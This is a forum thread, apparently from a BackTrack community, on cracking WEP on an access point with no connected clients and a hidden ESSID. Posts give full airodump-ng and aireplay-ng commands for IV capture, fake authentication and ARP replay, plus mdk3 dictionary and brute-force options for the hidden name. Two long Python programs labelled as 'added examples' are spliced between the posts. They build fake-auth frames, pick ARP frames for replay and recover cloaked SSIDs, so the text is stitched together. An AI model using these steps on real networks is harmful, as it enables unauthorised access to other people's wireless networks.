
Thread: Cracking WEP with no client

  1. #1
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    3

    Default Cracking WEP with no client

    In my test lab I have an AP with no clients connected to it, and I want to crack the WEP key by rebroadcasting the packets that I receive from the AP. I'll finally convert the broadcast packet so that the AP generates a new IV.

    Before this attack works, I first need to perform a fake authentication. This succeeds when I know the ESSID.

    So, the question is: how can I successfully authenticate without knowing the ESSID and with no wireless clients connected?

    cheers
    Damien

  2. #2
    Very good friend of the forum TAPE's Avatar
    Join Date
    Jan 2010
    Location
    Europe
    Posts
    599

    Default

    Check the latest video in BT4 video section...

  3. #3
    Just burned his ISO
    Join Date
    Oct 2009
    Posts
    1

    Default

    Quote Originally Posted by DamienThorn View Post
    In my test lab I have an AP with no clients connected to it, and I want to crack the WEP key by rebroadcasting the packets that I receive from the AP. I'll finally convert the broadcast packet so that the AP generates a new IV.

    Before this attack works, I first need to perform a fake authentication. This succeeds when I know the ESSID.

    So, the question is: how can I successfully authenticate without knowing the ESSID and with no wireless clients connected?

    cheers
    Damien
    Oh yes.. that's a really nice question..
    Hi everybody. My name is Andre, I'm new to BackTrack.

    Can anybody please help and tell me, like Damien asked?

    Thanks.
    Gbu.

  4. #4
    Just burned his ISO htons139's Avatar
    Join Date
    Sep 2008
    Posts
    23

    Default

    First, make sure to start airodump-ng, then run

    aireplay-ng -1 10 -a xx:xx:xx:xx:xx:xx mon0

    Insert the AP MAC address, and your injection-enabled ethernet card in place of mon0.

    Then start aireplay in ARP replay mode and watch for the magic!
    In a world where data is the coin of the realm, and transmissions are guarded by no better sentinels
    than man-made codes and corruptible devices, there is no such thing as a secret

  5. #5
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    3

    Default

    I have no luck: when I launch the fake auth attack, I always get the message "Please specify an ESSID", even when I specify -h and the MAC of my machine. So, association was not successful.

    When I then launch aireplay-ng using ARP replay, I get disassociation messages.

    Any suggestions ?

  6. #6
    Just burned his ISO htons139's Avatar
    Join Date
    Sep 2008
    Posts
    23

    Thumbs up

    Quote Originally Posted by DamienThorn View Post
    I have no luck, when I launch the fake auth attack, I get always the message Please specify an ESSID, even when I specify -h and the mac of my machine. So, association was not sucessful.

    When I then launch aireplay-ng using arp reply, I got disassociation messages.

    Any suggestions ?
    Sorry for confusing you with my other post; you should use "-a" and not "-b" (it has been corrected in the older post). Try that and aireplay-ng should not ask for the ESSID.

    Now for the long version of the reply
    -------------------------------------------------
    Your case

    1- You have an AP that is broadcasting its BSSID
    2- You have no MAC addresses of connected clients (not even from other, older sessions, not necessarily at the moment of the attack)

    The Attack:

    A- Start collecting IVs

    airodump-ng --ivs -w filename --bssid xx:xx:xx:xx:xx:xx --channel XX mon0

    Make sure you insert the AP BSSID in place of xx:xx:xx:xx:xx:xx, the channel number in place of XX, and the name of your injection-enabled NIC in place of mon0.

    B- Run aireplay in fake auth mode

    aireplay-ng -1 10 -a xx:xx:xx:xx:xx:xx mon0

    Insert the AP MAC address and the name of your NIC.

    If the access point does not have MAC filtering, then you will be able to use the fake authentication attack without the -h argument; otherwise this attack will not work unless you use

    aireplay-ng -1 10 -a xx:xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy:yy mon0

    where yy:yy:yy:yy:yy:yy is the MAC address of an already connected client (NOT YOUR NIC MAC).

    C- Finally, run aireplay in ARP replay mode

    aireplay-ng -3 -b xx:xx:xx:xx:xx:xx mon0

    Again, replace xx:xx:xx:xx:xx:xx with the AP MAC and mon0 with your NIC name.

    Good luck
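The ARP-replay step (C above) only works because an encrypted ARP request can be picked out of WEP traffic without the key, and because every replay makes the AP relay the broadcast under a fresh IV. The following is an added example, not the thread's own code and not aircrack-ng's: it shows the size-and-addressing heuristic for a WEP ARP request (36-byte LLC/SNAP+ARP plaintext plus 3-byte IV, 1-byte key-id and 4-byte ICV, so a 44-byte body and a 68-byte frame with the 24-byte header), extracts the IV each frame carries, and counts the distinct IVs collected, which is what has to grow before aircrack-ng can succeed. It assumes raw 802.11 frames without a radiotap header, no QoS field, and 3-address data frames; every MAC, IV and payload byte is a constructed placeholder.

```python
"""Added example (not from the thread, not aircrack-ng's code): selecting the
WEP-encrypted ARP requests that an ARP-replay attack resends, and tracking the
IVs collected. Assumptions: raw 802.11 frames, no radiotap, no QoS field,
3-address data frames; MACs, IVs and payload bytes are placeholders."""

FC_TYPE_DATA = 0x08                      # frame-control byte 0: type 2 (data), subtype 0
FLAG_TO_DS, FLAG_PROTECTED = 0x01, 0x40  # frame-control byte 1 flags
BCAST = b"\xff" * 6
AP = bytes.fromhex("001122334455")       # placeholder AP MAC (the -a / -b value)
STA = bytes.fromhex("66778899aabb")      # placeholder station MAC
UNICAST = bytes.fromhex("00aabbccddee")  # placeholder unicast destination
ARP_PLAINTEXT = 8 + 28                   # LLC/SNAP header + ARP packet = 36 bytes
WEP_OVERHEAD = 4 + 4                     # IV(3)+KeyID(1) in front, ICV(4) at the end
ARP_WEP_BODY = ARP_PLAINTEXT + WEP_OVERHEAD   # 44 bytes; 68-byte frame with the header


def parse_header(frame):
    """Return (fc0, flags, addr1, addr2, addr3, body) of a 3-address frame."""
    if len(frame) < 24:
        raise ValueError("frame shorter than an 802.11 header")
    return frame[0], frame[1], frame[4:10], frame[10:16], frame[16:22], frame[24:]


def build_data_frame(src, dst, body, bssid=AP, seq=0):
    """Constructed ToDS data frame with the Protected (WEP) bit set:
    addr1 = BSSID, addr2 = source station, addr3 = final destination."""
    hdr = bytes([FC_TYPE_DATA, FLAG_TO_DS | FLAG_PROTECTED]) + b"\x00\x00"
    hdr += bssid + src + dst + (seq << 4).to_bytes(2, "little")
    return hdr + body


def wep_body(iv, key_index, ciphertext, icv=b"\x00\x00\x00\x00"):
    """Constructed WEP body layout: IV, key-id byte (index in the top two bits),
    ciphertext, ICV. The ICV here is a placeholder, not a real CRC-32."""
    return iv + bytes([key_index << 6]) + ciphertext + icv


def is_arp_request_candidate(frame, bssid=AP):
    """WEP ARP-request heuristic: plain data frame, ToDS, Protected, sent to this
    BSSID, final destination ff:ff:ff:ff:ff:ff, encrypted body of exactly 44 bytes."""
    fc0, flags, a1, _, a3, body = parse_header(frame)
    if (fc0 & 0x0C) != FC_TYPE_DATA or (fc0 & 0xF0) != 0:
        return False
    if not (flags & FLAG_TO_DS) or not (flags & FLAG_PROTECTED):
        return False
    return a1 == bssid and a3 == BCAST and len(body) == ARP_WEP_BODY


def wep_iv(frame):
    """(iv_hex, key_index) read from the first four body bytes of a WEP frame."""
    body = parse_header(frame)[5]
    return body[:3].hex(), body[3] >> 6


def select_replay_candidates(frames, bssid=AP):
    """The frames an ARP-replay loop would resend unchanged (same IV, same ICV)."""
    return [f for f in frames if is_arp_request_candidate(f, bssid)]


def unique_ivs(frames, bssid=AP):
    """Distinct IVs seen in protected data frames of this BSS."""
    ivs = set()
    for f in frames:
        fc0, flags, a1, a2, a3, _ = parse_header(f)
        if (fc0 & 0x0C) == FC_TYPE_DATA and flags & FLAG_PROTECTED and bssid in (a1, a2, a3):
            ivs.add(wep_iv(f)[0])
    return ivs


def sample_capture():
    """Constructed frames: two ARP requests, a same-size unicast frame, an
    oversize broadcast, and a beacon (management, never a candidate)."""
    arp_ct = b"\xaa" * ARP_PLAINTEXT      # stands in for the encrypted LLC/SNAP+ARP bytes
    return [
        build_data_frame(STA, BCAST, wep_body(b"\x01\x02\x03", 0, arp_ct), seq=1),
        build_data_frame(STA, BCAST, wep_body(b"\x04\x05\x06", 0, arp_ct), seq=2),
        build_data_frame(STA, UNICAST, wep_body(b"\x07\x08\x09", 0, arp_ct), seq=3),
        build_data_frame(STA, BCAST, wep_body(b"\x0a\x0b\x0c", 1, b"\xbb" * 60), seq=4),
        bytes([0x80, 0]) + b"\x00\x00" + BCAST + AP + AP + b"\x00\x00" + b"\x00" * 12,
    ]


if __name__ == "__main__":
    cap = sample_capture()
    picked = select_replay_candidates(cap)
    print(len(picked), "replay candidates; IVs:", [wep_iv(f) for f in picked])
    print(len(unique_ivs(cap)), "distinct IVs so far")
```

The selector never looks at the payload: the replay tool cannot decrypt it either, which is why a unicast frame of the same size is rejected only by its destination and why a broadcast of a different size is rejected only by its length.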

  7. #7
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    3

    Default

    Your situation works if the AP is broadcasting its ESSID, but the case is :

    1) The AP does not broadcast its ESSID
    2) There are no wireless clients connected to the AP

    So, in your step B, I cannot use -h YY:YY, since there are no wireless clients

  8. #8
    Just burned his ISO htons139's Avatar
    Join Date
    Sep 2008
    Posts
    23

    Default

    ESSID
    The Extended Service Set ID (ESSID) is the name of the network you want to access. It is used to identify different wireless networks.

    BSSID
    The BSSID is a 48bit identity used to identify a particular BSS (Basic Service Set) within an area.

    It is clear you need to do some more reading... these are basics you should be informed about... do your homework and ask me no more questions before you do so.

  9. #9
    Very good friend of the forum TAPE's Avatar
    Join Date
    Jan 2010
    Location
    Europe
    Posts
    599

    Default

    ^
    Dude, you are misreading the OP's question completely..
    reading abilities.. hmm..

    He is talking about a network that is not broadcasting the ESSID..
    So a hidden SSID..


    There are a couple of options to try to find out what the ESSID is:

    1. You do a dictionary attack on the network using mdk3.
    2. You do a bruteforce attack on the network using mdk3
    (not recommended for any SSID over 4 characters..)
    3. You monitor the network and wait for someone to probe it / associate with it.



    So, to Damien:

    When you are running airodump and checking your network, is it mentioning a length 0 SSID, or length 5, or some other value?

    If you can actually see how many characters it is, you can decide whether to use a bruteforce option. If it is length 0 then you will not know, so you would need to try the dictionary approach.

    Again, I posted a vid on that specific situation:
    http://forums.remote-exploit.org/bt4...track-4-a.html

    Check it out, and obviously, as you know the ESSID of your network, you can alter wordlists etc. to suit the best method of the above.
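What the beacon of a cloaked network still leaks, and why the fake-auth step in this thread fails without the name, can both be seen by parsing the management frames directly. The following is an added example, not the thread's own code and not aircrack-ng's or mdk3's: it reads constructed 802.11 beacons, recovers the SSID length that airodump-ng reports for a hidden network (the IE is either empty or filled with NUL bytes), fills in the real name from the first probe response or association request that carries it (option 3 above), and then builds the two client-side frames behind aireplay-ng -1 to show that open-system authentication needs no SSID while the association request must name it. It assumes raw 802.11 frames without a radiotap header; the MACs, the SSID "lab05" and all other bytes are placeholders. The dictionary and brute-force options via mdk3 are not shown.

```python
"""Added example (not the thread's code, not aircrack-ng's or mdk3's): what a
cloaked beacon leaks, how a probe response or association request reveals the
ESSID, and which fake-auth frame actually needs it. Assumptions: raw 802.11
management frames without radiotap; all MACs, SSIDs and bytes are placeholders."""
import struct

SUB_ASSOC_REQ, SUB_PROBE_RESP, SUB_BEACON, SUB_AUTH = 0x0, 0x5, 0x8, 0xB
FIXED_LEN = {SUB_BEACON: 12, SUB_PROBE_RESP: 12, SUB_ASSOC_REQ: 4, SUB_AUTH: 6}
TAG_SSID, TAG_RATES = 0, 1
AP, AP2 = bytes.fromhex("001122334455"), bytes.fromhex("00aabbccddee")   # placeholder APs
STA, BCAST = bytes.fromhex("66778899aabb"), b"\xff" * 6                   # placeholder client


def mgmt_frame(subtype, addr1, addr2, addr3, fixed=b"", ies=()):
    """Build a 3-address management frame: FC, duration, addresses, seq, fixed
    fields, then (tag, length, value) information elements."""
    hdr = bytes([subtype << 4, 0]) + b"\x00\x00" + addr1 + addr2 + addr3 + b"\x00\x00"
    return hdr + fixed + b"".join(bytes([t, len(v)]) + v for t, v in ies)


def is_mgmt(frame):
    return (frame[0] & 0x0C) == 0


def parse_ies(data):
    """Information elements as {tag: value}; the first occurrence of a tag wins."""
    ies, i = {}, 0
    while i + 2 <= len(data):
        tag, ln = data[i], data[i + 1]
        if i + 2 + ln > len(data):
            break                         # truncated IE: stop rather than misread it
        ies.setdefault(tag, data[i + 2:i + 2 + ln])
        i += 2 + ln
    return ies


def ssid_ie(frame):
    """(ssid, cloaked): cloaked if the IE is empty or all NULs. Both styles show
    up in airodump-ng as <length: N>, so N is known before any client appears."""
    sub = frame[0] >> 4
    ssid = parse_ies(frame[24 + FIXED_LEN[sub]:]).get(TAG_SSID, b"")
    return ssid, not any(ssid)


def recover_ssids(frames):
    """BSSID -> {'cloaked', 'length', 'ssid'}: beacons give the length, a probe
    response (AP -> client) or association request (client -> AP) gives the name."""
    seen = {}
    for f in frames:
        if not is_mgmt(f) or (f[0] >> 4) not in (SUB_BEACON, SUB_PROBE_RESP, SUB_ASSOC_REQ):
            continue
        bssid = f[16:22]                  # addr3 is the BSSID in all three subtypes
        ssid, cloaked = ssid_ie(f)
        entry = seen.setdefault(bssid, {"cloaked": cloaked, "length": len(ssid), "ssid": None})
        if (f[0] >> 4) == SUB_BEACON:
            entry["cloaked"], entry["length"] = cloaked, len(ssid)
        if not cloaked:
            entry["ssid"] = ssid.decode("utf-8", "replace")
    return seen


def fake_auth_exchange(sta, bssid, ssid):
    """The two client-side frames behind aireplay-ng -1. Open-system
    authentication (alg 0, seq 1) carries no SSID and works against a cloaked
    AP; the association request must carry the ESSID, hence the prompt for it."""
    auth = mgmt_frame(SUB_AUTH, bssid, sta, bssid, fixed=struct.pack("<HHH", 0, 1, 0))
    assoc = mgmt_frame(SUB_ASSOC_REQ, bssid, sta, bssid,
                       fixed=struct.pack("<HH", 0x0011, 10),      # ESS+Privacy, listen interval
                       ies=[(TAG_SSID, ssid), (TAG_RATES, b"\x82\x84\x8b\x96")])
    return auth, assoc


def sample_capture():
    """Constructed frames: a cloaked AP (5 NUL bytes), a visible AP, then a probe
    response and an association request that reveal the cloaked name."""
    beacon_fixed = b"\x00" * 8 + struct.pack("<HH", 100, 0x0011)   # timestamp, interval, capability
    rates = (TAG_RATES, b"\x82\x84\x8b\x96")
    return [
        mgmt_frame(SUB_BEACON, BCAST, AP, AP, beacon_fixed, [(TAG_SSID, b"\x00" * 5), rates]),
        mgmt_frame(SUB_BEACON, BCAST, AP2, AP2, beacon_fixed, [(TAG_SSID, b"OpenNet"), rates]),
        mgmt_frame(SUB_PROBE_RESP, STA, AP, AP, beacon_fixed, [(TAG_SSID, b"lab05"), rates]),
        mgmt_frame(SUB_ASSOC_REQ, AP, STA, AP, struct.pack("<HH", 0x0011, 10), [(TAG_SSID, b"lab05")]),
    ]


if __name__ == "__main__":
    for bssid, info in recover_ssids(sample_capture()).items():
        print(bssid.hex(":"), info)
    auth, assoc = fake_auth_exchange(STA, AP, b"lab05")
    print("auth carries SSID:", TAG_SSID in parse_ies(auth[24 + FIXED_LEN[SUB_AUTH]:]))
    print("assoc carries SSID:", parse_ies(assoc[24 + FIXED_LEN[SUB_ASSOC_REQ]:]).get(TAG_SSID))
```

With a 5-NUL beacon the output reports length 5 and no name until the probe response arrives, which is the situation TAPE describes: a known length narrows a brute force, a length of 0 leaves only the dictionary or the wait for a client.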

  10. #10
    Just burned his ISO
    Join Date
    Jun 2009
    Posts
    8

    Default Error at 'replay-ng

    Quote Originally Posted by htons139 View Post
    Sorry for confusing you with my other post; you should use "-a" and not "-b" (it has been corrected in the older post). Try that and aireplay-ng should not ask for the ESSID.

    Now for the long version of the reply
    -------------------------------------------------
    Your case

    1- You have an AP that is broadcasting its BSSID
    2- You have no MAC addresses of connected clients (not even from other, older sessions, not necessarily at the moment of the attack)

    The Attack:

    A- Start collecting IVs

    airodump-ng --ivs -w filename --bssid xx:xx:xx:xx:xx:xx --channel XX mon0

    Make sure you insert the AP BSSID in place of xx:xx:xx:xx:xx:xx, the channel number in place of XX, and the name of your injection-enabled NIC in place of mon0.

    B- Run aireplay in fake auth mode

    aireplay-ng -1 10 -a xx:xx:xx:xx:xx:xx mon0

    Insert the AP MAC address and the name of your NIC.

    If the access point does not have MAC filtering, then you will be able to use the fake authentication attack without the -h argument; otherwise this attack will not work unless you use

    aireplay-ng -1 10 -a xx:xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy:yy mon0

    where yy:yy:yy:yy:yy:yy is the MAC address of an already connected client (NOT YOUR NIC MAC).

    C- Finally, run aireplay in ARP replay mode

    aireplay-ng -3 -b xx:xx:xx:xx:xx:xx mon0

    Again, replace xx:xx:xx:xx:xx:xx with the AP MAC and mon0 with your NIC name.

    Good luck
    I've been attempting to do this very thing, yet when attempting this [code: airodump-ng --ivs -w filename --bssid xx:xx:xx:xx:xx:xx --channel XX mon0] I get "Invalid output format: IV's and PCAP format cannot be used together". What am I doing wrong? Thanks in advance for handing down the knowledge.
